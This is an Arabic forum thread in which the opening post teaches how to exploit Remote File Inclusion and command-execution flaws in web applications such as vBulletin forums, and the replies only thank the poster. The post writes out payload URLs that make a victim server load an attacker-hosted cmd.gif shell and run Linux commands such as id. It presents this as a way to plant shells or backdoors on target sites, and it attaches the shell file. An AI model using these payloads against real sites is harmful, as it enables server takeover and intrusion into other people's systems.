منتديات  

العودة   منتديات مدرسة المشاغبين > منتدى الكمبيوتر برامج محمول اجهزة تعليم كمبيوتر computer حاسوب كل مفيد للكمبيوتر و للانترنت > الهكرز و الاختراق حماية فيروسات اختراق كراك hacker crack virus

مشاركتك هنا تمثل للجميع أخلاقك وثقافتك تذكر هذا جيدا قبل نشرها في موضوع جديد


بنات سكستين منتديات المنطقة الشرقية ينتهي في 22-2-1433هـ
منتدى شموخ العز ينتهي في 6-3-2012 مرصد الطقس 13-4-1433هـ بنر منتديات شمعة الخليج ينتهي في 10-4-1433 هـ

روابط مهمة و مفيدة : لاستعادة الباسورد الرقم السري || كيف يتم تفعيل الاشتراك || افضل طريقة لطلب كود تفعيل على البريد
استضافة مواقع معنى كلمة رسائل مسجات دردشة شات افلام × فيلم
فلاش اسلامي الثقافة الجنسية في عالم الجنس صور جديدة   توبيكات × توبيك
ابتسامات خلفيات العاب جديدة دليل مواقع - مركز تحميل ملفات
بطاقات كروت جوال موبايل جافا java قصص روايات -
كتب الكترونية ماسنجر في مسنجر - - العاب بنات للبنات فقط 2010

موضوع مغلق
 
أدوات الموضوع طريقة عرض الموضوع
  #1 (permalink)  
قديم 02-09-2006, 06:29 AM
جاي معه ملفه
 
تاريخ التسجيل: May 2005
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 20
العمر : 34
Rep Power: 0
zmani النقاط 10
رقص ( تعلم ثغرات ) Remote File Inclusion + commands execution




بسم الله الرحمن الرحيم


شباب اليوم موضوعنا عن الثغرات التي من نوع

Remote File Inclusion

commands execution


وراح أشرح إستخدامها بالتفصيل إن شاء الله لأنها خطيره ورائعه

وكثير من البرامج المشهوره لدينا أصيبت بمثلها

مثل منتدى vBulletin وغيره

بسم الله نبدأ :

commands execution

معناه تقدر تنفذ أوامر لينكس

يعني إذا وجدة في بعض الثغرات أن نوعيتها commands execution

فاعرف انك تستطيع عن طريق الثغرة تطبيق أوامر اللينكس

وهذا شيء ممتاز يعني تقدر ترفع شل على الموقع اللي فيه الثغره

أو ترفع باكدور أو اللي تبيه لأن الثغره تسمح لك بتنفيذ أوامر لينكس على السيرفر

وطريقة إستعمال مثل هذه الثغرات سهل وكل اللي عليك هو وضع الأمر اللذي تريده

الأن ناخذ الثغره تبع منتديات VB الجيل الثالث
والي رابطها تحصله هناا
شوف الإستغلال :
كود:
http://www.[victim].com/vb/include.php?test=http://attacker
كل اللي عليك إنك تغيير الأمر ( id ) إلى أي أمر لينكس

ومشروح بالموضوع كل شيء بالتفصيل وبالصور
=====
Remote File Inclusion
أيضاً تستطيع عن طريقها تطبيق أوامر اللينكس

لكن لازم يكون عندك ملف مثل هذا cmd.gif وهو اللي يخليك تنفذ أوامر اللينكس

على الموقع الضحيه

وتكون رافعه على موقعك الشخصي

الأن :

لنفرض أنك وجدت في أحد مواقع الحماية ثغره ووجدت

إستغلالها هكذا
كود:
http://www.[victim].com/vb/include.php?test=http://attacker
ولنفرض أن الموقع اللي عليه cmd.gifهو هذا
http://www.(hacker).com/cmd.gif
يعني سيصبح الرابط في المتصفح هكذا
http://www.(hacker).com/vb/include.p...gif?&cmd=order
لاحظ ماذا أضفنا ?&cmd=order

مكان كلمة order تضع أوامر لينكس ولنفرض أنك تريد معرفة صلاحياتك على الموقع الضحية

يعني أنك ستستخدم الأمر id لمعرفة الصلاحيات

وهذا يعني أن الرابط سيصبح هكذا
كود:
http://www.(hacker).com/vb/include.php?test=http://www.(hacker).com/cmd.gif?&cmd=id
وهذا طبعاً مثال لمعرفة كيفية تطبيق مثل هذه الثغرات

والأن لنأخذ مثال أخر ونشرحه بالتفصيل
كود:
http://[victim]/page.php?test=http://attacker
victim معروف وهو الموقع الضحية

page.php الصفحه التي يوجد بها الثغره

page.php?test الخطأ المسبب للثغره

attacker وهو الموقع المهاجم وهو موقعك الذي سيكون عليه الملف cmd.gif


وهذا يعني أن الرابط الذي سوف تستخدمه في الإختراق سوف يصبح هكذا
كود:
http://www.aaa.com/page.php?test=http://www.attaker.com/cmd.gif?&cmd=id
وطبعاً هناك ملفات أخرى غير cmd.gif تسمح لك بتنفيذ أوامر لينكس


والأن مو باقي عليك الا تعرف اوامر اللينكس وعملها

وهذي تلقاها في نفس القسم ابحث تحصلها باذن الله

وهذا موضوع فيه ثغره جديده من نوع Remote File Inclusion
Remote File Inclusion هناااا
ملاحظة : الملف cmd.gif مرفق
والفرق بين Remote Command execution و Remote File Inclusion


ان Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الاوامر مكان الاي دي((رابط موقعك مع الاي دي ))

و Remote Command execution تستخدم اوامر اللينكس على طول بدون كود مرفوع (( الاي دي فقط ))

تحياتي
عذابي غير=zmani

الملفات المرفقة
نوع الملف: zip cmd.zip‏ (140 بايت, المشاهدات 84)


من مواضيعي في الموقع على الموقع 0 ( تعلم ثغرات ) Remote File Inclusion + commands execution
0 إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي
0 :::::مطللوووب:::::
0 شرح اوامر الشيل (اساسيات)اوامر لينكس
0 :::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::


_________________
  #2 (permalink)  
قديم 02-09-2006, 02:04 PM
صور عاشق ميلانو
اداري سابق
 
تاريخ التسجيل: Nov 2005
البلد - المكان و السكن : وسط عين الحبيب
السيرة : شاعر وحبيبي دفتري
هواية : كتابة وقراءة الشعر
وظيفة - عمل: لاشي
جنس : على كيفي
جنسية : عمراني وأفتخر
موقع :
نوع الجوال :
مشاركات : 4,448
العمر :
Rep Power: 11
عاشق ميلانو النقاط 10



يسلموووووووووو على الشرح


من مواضيعي في الموقع على الموقع 0 قتيل الدموع..!
0 يوجد آيفووون فووووو ر للبيع أبيض مع أسود
0 فراق الأحبة
0 انا كلي فداك
0 يا قصيده
0 صور لبريانكا شوبرا


_________________

عزيزي العضو نرجو منك التبليغ عن أي مشاركة مخالفه بالضغط على هذه الصورة وتجنب المخالفات لتتجنب إيقاف عضويتك
  #3 (permalink)  
قديم 02-10-2006, 12:33 PM
صعب اننا نوصفه
 
تاريخ التسجيل: Sep 2005
البلد - المكان و السكن : K.S.A
السيرة :
هواية : الاختراق والحمايه
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 3,377
العمر :
Rep Power: 10
وطواط النقاط 10



مشكور اخوي على الشرح
اخوكم\\وطواط


من مواضيعي في الموقع على الموقع 0 كيفية اشتراك بموقع dyndns شرح فيديو من وطواط
0 كيفية اشتراك بموقع dyndns شرح فيديو من وطواط
0 برنامج فك المواقع المحجوبه برنامج ultrasurf9.3
0 حصريا على مدرسة المشاغبين بدون برنامج افتح اي موقع محجوب وخاصتنا ل نو اي بي
0 ::.سبب ايقاف دورة مدرسة المشاغبين .::
0 wToOoAT..!..اقوى برنامج دمج باتش مع صوره او غيروه نادر..!..wToOoAT


_________________
وطواط

گـرهـتٍ المدرســہ وآلتدريــس ولأ عـآد لـے بالهكـرٍ خ ـآطرٍ


  #4 (permalink)  
قديم 02-15-2006, 09:08 PM
جاي معه ملفه
 
تاريخ التسجيل: May 2005
البلد - المكان و السكن :
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 20
العمر : 34
Rep Power: 0
zmani النقاط 10



العفووو يا اخوان
تحياتي
زماني


من مواضيعي في الموقع على الموقع 0 ( تعلم ثغرات ) Remote File Inclusion + commands execution
0 إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي
0 :::::مطللوووب:::::
0 شرح اوامر الشيل (اساسيات)اوامر لينكس
0 :::::شرح اختراق الجيل الثالث باحدى ثغرات الصندوق السحري او الماسي بالتفصيل الممل:::::


_________________
  #5 (permalink)  
قديم 02-16-2006, 11:47 PM
صور هاك بلو
مرابط بالمدرسه
 
تاريخ التسجيل: Nov 2005
البلد - المكان و السكن : السعوديه ((الدمام))
السيرة :
هواية :
وظيفة - عمل:
جنس :
جنسية :
موقع :
نوع الجوال :
مشاركات : 402
العمر : 29
Rep Power: 7
هاك بلو النقاط 10



يعطيك العافيه على الشرح
أخوك هاك بلو


من مواضيعي في الموقع على الموقع 0 MSN messenger 8.0 + Patch
0 اخر اصدار لبرنامج الحماية الخارق
0 احدث طرق الاختراق
0 أنتبه من الرسائل على الاميل بشكل هذه ((صوره))
0 كتاب عن الهاكرز بعربي
0 آخراصدار من برنامج الحماية الخارق Deep Freeze Enterprise Full 5.5


_________________

موضوع مغلق

مواقع النشر (المفضلة)

أدوات الموضوع
طريقة عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر رد
هل تعلم أن أول ما نفخ الروح في آدم عليه السلام؟ abash المنتدى الاسلامى 15 07-20-2009 05:12 PM
هل تعلم ان المعلومات<<مفيدة شهيد الرمش منتدى الجريمه حوادث كوارث جرائم احداث عالميه وقضايا ساخنه الاتجاه المعاكس 9 09-14-2005 03:01 AM
هل تعلم زغلول بيه المنتدى الاسلامى 4 04-11-2003 03:16 PM


للاعلان بالموقع

للاعلان بالموقع جوال 0555055075 ابو عمر بدر-جامعة نجران ينتهي في 3-8-1432 هـ-جامعة جازان ينتهي في 28-3-2012
الساعة الآن توقيت السعودية الرياض جدة الشرقية القصيم 09:55 PM.


Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd diamond
جميع ماينشر بالموقع لا يعبر عن اصحاب الموقع انما يعبر عن صاحبه

SEO by vBSEO 3.2.0